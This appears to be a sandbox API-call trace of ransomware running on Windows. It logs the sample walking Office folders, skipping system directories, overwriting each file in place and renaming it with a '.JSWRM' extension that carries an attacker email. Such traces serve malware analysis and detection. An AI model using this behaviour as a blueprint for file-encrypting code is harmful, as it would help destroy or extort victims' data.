1 [0131.106] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NotifierDisableUpArrow.jpg", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0131.106] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NotifierDisableUpArrow.jpg", cchWideChar=26, lpMultiByteStr=0x240ef8, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NotifierDisableUpArrow.jpg", lpUsedDefaultChar=0x0) returned 26 [0131.106] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NotifierDisableUpArrow.jpg", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0131.106] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NotifierDisableUpArrow.jpg", cchWideChar=26, lpMultiByteStr=0x2410d8, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NotifierDisableUpArrow.jpg", lpUsedDefaultChar=0x0) returned 26 [0131.106] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0131.106] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0131.106] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\NotifierDisableUpArrow.jpg" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\notifierdisableuparrow.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0131.107] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=775) returned 1 [0131.107] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.107] ReadFile (in: hFile=0x314, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x300, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e534*=0x300, lpOverlapped=0x0) returned 1 [0131.108] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.109] WriteFile (in: hFile=0x314, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e530*=0x300, lpOverlapped=0x0) returned 1 [0131.109] CloseHandle (hObject=0x314) returned 1 [0131.109] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\NotifierDisableUpArrow.jpg" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\notifierdisableuparrow.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\NotifierDisableUpArrow.jpg.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\notifierdisableuparrow.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0131.112] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x197321ed, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x197321ed, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x19758458, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x368, dwReserved0=0x60002, dwReserved1=0x225316, cFileName="NotifierDownArrow.jpg", cAlternateFileName="NOTIFI~3.JPG")) returned 1 [0131.112] lstrcmpiW (lpString1="NotifierDownArrow.jpg", lpString2=".") returned 1 [0131.112] lstrcmpiW (lpString1="NotifierDownArrow.jpg", lpString2="..") returned 1 [0131.112] lstrcmpiW (lpString1="NotifierDownArrow.jpg", lpString2="...") returned 1 [0131.113] lstrcmpiW (lpString1="NotifierDownArrow.jpg", lpString2="windows") returned -1 [0131.113] lstrcmpiW (lpString1="NotifierDownArrow.jpg", lpString2="recovery") returned -1 [0131.113] lstrcmpiW (lpString1="NotifierDownArrow.jpg", lpString2="perflogs") returned -1 [0131.113] lstrcmpiW (lpString1="NotifierDownArrow.jpg", lpString2="documents and settings") returned 1 [0131.113] lstrcmpiW (lpString1="NotifierDownArrow.jpg", lpString2="$RECYCLE.BIN") returned 1 [0131.113] lstrcmpiW (lpString1="NotifierDownArrow.jpg", lpString2="system volume information") returned -1 [0131.113] lstrcmpiW (lpString1="NotifierDownArrow.jpg", lpString2="msocache") returned 1 [0131.113] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NotifierDownArrow.jpg", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0131.113] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NotifierDownArrow.jpg", cchWideChar=21, lpMultiByteStr=0x241380, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NotifierDownArrow.jpg", lpUsedDefaultChar=0x0) returned 21 [0131.113] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NotifierDownArrow.jpg", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0131.113] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NotifierDownArrow.jpg", cchWideChar=21, lpMultiByteStr=0x241268, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NotifierDownArrow.jpg", lpUsedDefaultChar=0x0) returned 21 [0131.113] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0131.113] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0131.113] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\NotifierDownArrow.jpg" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\notifierdownarrow.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0131.114] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=872) returned 1 [0131.114] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.114] ReadFile (in: hFile=0x314, lpBuffer=0x20e550, nNumberOfBytesToRead=0x360, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesRead=0x345e534*=0x360, lpOverlapped=0x0) returned 1 [0131.115] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.115] WriteFile (in: hFile=0x314, lpBuffer=0x20e550*, nNumberOfBytesToWrite=0x360, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesWritten=0x345e530*=0x360, lpOverlapped=0x0) returned 1 [0131.115] CloseHandle (hObject=0x314) returned 1 [0131.115] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\NotifierDownArrow.jpg" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\notifierdownarrow.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\NotifierDownArrow.jpg.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\notifierdownarrow.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0131.116] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x19889710, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x19889710, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x19889710, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3c0, dwReserved0=0x60002, dwReserved1=0x225316, cFileName="NotifierUpArrow.jpg", cAlternateFileName="NO6669~1.JPG")) returned 1 [0131.116] lstrcmpiW (lpString1="NotifierUpArrow.jpg", lpString2=".") returned 1 [0131.116] lstrcmpiW (lpString1="NotifierUpArrow.jpg", lpString2="..") returned 1 [0131.116] lstrcmpiW (lpString1="NotifierUpArrow.jpg", lpString2="...") returned 1 [0131.116] lstrcmpiW (lpString1="NotifierUpArrow.jpg", lpString2="windows") returned -1 [0131.116] lstrcmpiW (lpString1="NotifierUpArrow.jpg", lpString2="recovery") returned -1 [0131.116] lstrcmpiW (lpString1="NotifierUpArrow.jpg", lpString2="perflogs") returned -1 [0131.116] lstrcmpiW (lpString1="NotifierUpArrow.jpg", lpString2="documents and settings") returned 1 [0131.116] lstrcmpiW (lpString1="NotifierUpArrow.jpg", lpString2="$RECYCLE.BIN") returned 1 [0131.117] lstrcmpiW (lpString1="NotifierUpArrow.jpg", lpString2="system volume information") returned -1 [0131.117] lstrcmpiW (lpString1="NotifierUpArrow.jpg", lpString2="msocache") returned 1 [0131.117] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NotifierUpArrow.jpg", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0131.117] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NotifierUpArrow.jpg", cchWideChar=19, lpMultiByteStr=0x241100, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NotifierUpArrow.jpg", lpUsedDefaultChar=0x0) returned 19 [0131.117] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NotifierUpArrow.jpg", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0131.117] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NotifierUpArrow.jpg", cchWideChar=19, lpMultiByteStr=0x240f70, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NotifierUpArrow.jpg", lpUsedDefaultChar=0x0) returned 19 [0131.117] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0131.117] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0131.117] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\NotifierUpArrow.jpg" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\notifieruparrow.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0131.118] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=960) returned 1 [0131.118] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.118] ReadFile (in: hFile=0x314, lpBuffer=0x230a00, nNumberOfBytesToRead=0x3c0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesRead=0x345e534*=0x3c0, lpOverlapped=0x0) returned 1 [0131.120] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.120] WriteFile (in: hFile=0x314, lpBuffer=0x230a00*, nNumberOfBytesToWrite=0x3c0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesWritten=0x345e530*=0x3c0, lpOverlapped=0x0) returned 1 [0131.120] CloseHandle (hObject=0x314) returned 1 [0131.120] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\NotifierUpArrow.jpg" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\notifieruparrow.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\NotifierUpArrow.jpg.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\notifieruparrow.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0131.121] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x19758458, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x19758458, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1977e6ab, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x133a, dwReserved0=0x60002, dwReserved1=0x225316, cFileName="NotifierWindowMask.bmp", cAlternateFileName="NOTIFI~1.BMP")) returned 1 [0131.121] lstrcmpiW (lpString1="NotifierWindowMask.bmp", lpString2=".") returned 1 [0131.121] lstrcmpiW (lpString1="NotifierWindowMask.bmp", lpString2="..") returned 1 [0131.121] lstrcmpiW (lpString1="NotifierWindowMask.bmp", lpString2="...") returned 1 [0131.121] lstrcmpiW (lpString1="NotifierWindowMask.bmp", lpString2="windows") returned -1 [0131.121] lstrcmpiW (lpString1="NotifierWindowMask.bmp", lpString2="recovery") returned -1 [0131.121] lstrcmpiW (lpString1="NotifierWindowMask.bmp", lpString2="perflogs") returned -1 [0131.121] lstrcmpiW (lpString1="NotifierWindowMask.bmp", lpString2="documents and settings") returned 1 [0131.121] lstrcmpiW (lpString1="NotifierWindowMask.bmp", lpString2="$RECYCLE.BIN") returned 1 [0131.121] lstrcmpiW (lpString1="NotifierWindowMask.bmp", lpString2="system volume information") returned -1 [0131.121] lstrcmpiW (lpString1="NotifierWindowMask.bmp", lpString2="msocache") returned 1 [0131.121] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NotifierWindowMask.bmp", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0131.121] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NotifierWindowMask.bmp", cchWideChar=22, lpMultiByteStr=0x241290, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NotifierWindowMask.bmp", lpUsedDefaultChar=0x0) returned 22 [0131.121] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NotifierWindowMask.bmp", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0131.121] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NotifierWindowMask.bmp", cchWideChar=22, lpMultiByteStr=0x241308, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NotifierWindowMask.bmp", lpUsedDefaultChar=0x0) returned 22 [0131.121] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0131.121] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0131.121] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\NotifierWindowMask.bmp" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\notifierwindowmask.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0131.122] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=4922) returned 1 [0131.122] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.122] ReadFile (in: hFile=0x314, lpBuffer=0x278330, nNumberOfBytesToRead=0x1330, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesRead=0x345e534*=0x1330, lpOverlapped=0x0) returned 1 [0131.124] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.124] WriteFile (in: hFile=0x314, lpBuffer=0x278330*, nNumberOfBytesToWrite=0x1330, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesWritten=0x345e530*=0x1330, lpOverlapped=0x0) returned 1 [0131.124] CloseHandle (hObject=0x314) returned 1 [0131.124] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\NotifierWindowMask.bmp" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\notifierwindowmask.bmp"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\NotifierWindowMask.bmp.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\notifierwindowmask.bmp.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0131.125] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1983d259, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1983d259, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x198634b7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x133a, dwReserved0=0x60002, dwReserved1=0x225316, cFileName="NotifierWindowMaskRTL.bmp", cAlternateFileName="NOTIFI~2.BMP")) returned 1 [0131.125] lstrcmpiW (lpString1="NotifierWindowMaskRTL.bmp", lpString2=".") returned 1 [0131.125] lstrcmpiW (lpString1="NotifierWindowMaskRTL.bmp", lpString2="..") returned 1 [0131.125] lstrcmpiW (lpString1="NotifierWindowMaskRTL.bmp", lpString2="...") returned 1 [0131.125] lstrcmpiW (lpString1="NotifierWindowMaskRTL.bmp", lpString2="windows") returned -1 [0131.125] lstrcmpiW (lpString1="NotifierWindowMaskRTL.bmp", lpString2="recovery") returned -1 [0131.126] lstrcmpiW (lpString1="NotifierWindowMaskRTL.bmp", lpString2="perflogs") returned -1 [0131.126] lstrcmpiW (lpString1="NotifierWindowMaskRTL.bmp", lpString2="documents and settings") returned 1 [0131.126] lstrcmpiW (lpString1="NotifierWindowMaskRTL.bmp", lpString2="$RECYCLE.BIN") returned 1 [0131.126] lstrcmpiW (lpString1="NotifierWindowMaskRTL.bmp", lpString2="system volume information") returned -1 [0131.126] lstrcmpiW (lpString1="NotifierWindowMaskRTL.bmp", lpString2="msocache") returned 1 [0131.126] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NotifierWindowMaskRTL.bmp", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0131.126] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NotifierWindowMaskRTL.bmp", cchWideChar=25, lpMultiByteStr=0x2411c8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NotifierWindowMaskRTL.bmp", lpUsedDefaultChar=0x0) returned 25 [0131.126] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NotifierWindowMaskRTL.bmp", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0131.126] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NotifierWindowMaskRTL.bmp", cchWideChar=25, lpMultiByteStr=0x2410d8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NotifierWindowMaskRTL.bmp", lpUsedDefaultChar=0x0) returned 25 [0131.126] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0131.126] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0131.126] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\NotifierWindowMaskRTL.bmp" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\notifierwindowmaskrtl.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0131.127] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=4922) returned 1 [0131.127] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.127] ReadFile (in: hFile=0x314, lpBuffer=0x278330, nNumberOfBytesToRead=0x1330, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesRead=0x345e534*=0x1330, lpOverlapped=0x0) returned 1 [0131.129] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.129] WriteFile (in: hFile=0x314, lpBuffer=0x278330*, nNumberOfBytesToWrite=0x1330, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesWritten=0x345e530*=0x1330, lpOverlapped=0x0) returned 1 [0131.129] CloseHandle (hObject=0x314) returned 1 [0131.129] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\NotifierWindowMaskRTL.bmp" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\notifierwindowmaskrtl.bmp"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\NotifierWindowMaskRTL.bmp.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\notifierwindowmaskrtl.bmp.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0131.135] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1977e6ab, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1977e6ab, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x197a4903, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xf8d, dwReserved0=0x60002, dwReserved1=0x225316, cFileName="OutofSyncIconImages.jpg", cAlternateFileName="OUTOFS~1.JPG")) returned 1 [0131.135] lstrcmpiW (lpString1="OutofSyncIconImages.jpg", lpString2=".") returned 1 [0131.135] lstrcmpiW (lpString1="OutofSyncIconImages.jpg", lpString2="..") returned 1 [0131.135] lstrcmpiW (lpString1="OutofSyncIconImages.jpg", lpString2="...") returned 1 [0131.135] lstrcmpiW (lpString1="OutofSyncIconImages.jpg", lpString2="windows") returned -1 [0131.135] lstrcmpiW (lpString1="OutofSyncIconImages.jpg", lpString2="recovery") returned -1 [0131.135] lstrcmpiW (lpString1="OutofSyncIconImages.jpg", lpString2="perflogs") returned -1 [0131.135] lstrcmpiW (lpString1="OutofSyncIconImages.jpg", lpString2="documents and settings") returned 1 [0131.135] lstrcmpiW (lpString1="OutofSyncIconImages.jpg", lpString2="$RECYCLE.BIN") returned 1 [0131.135] lstrcmpiW (lpString1="OutofSyncIconImages.jpg", lpString2="system volume information") returned -1 [0131.135] lstrcmpiW (lpString1="OutofSyncIconImages.jpg", lpString2="msocache") returned 1 [0131.135] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutofSyncIconImages.jpg", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0131.135] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutofSyncIconImages.jpg", cchWideChar=23, lpMultiByteStr=0x241308, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OutofSyncIconImages.jpg", lpUsedDefaultChar=0x0) returned 23 [0131.135] WideCharToMultiByte (in: 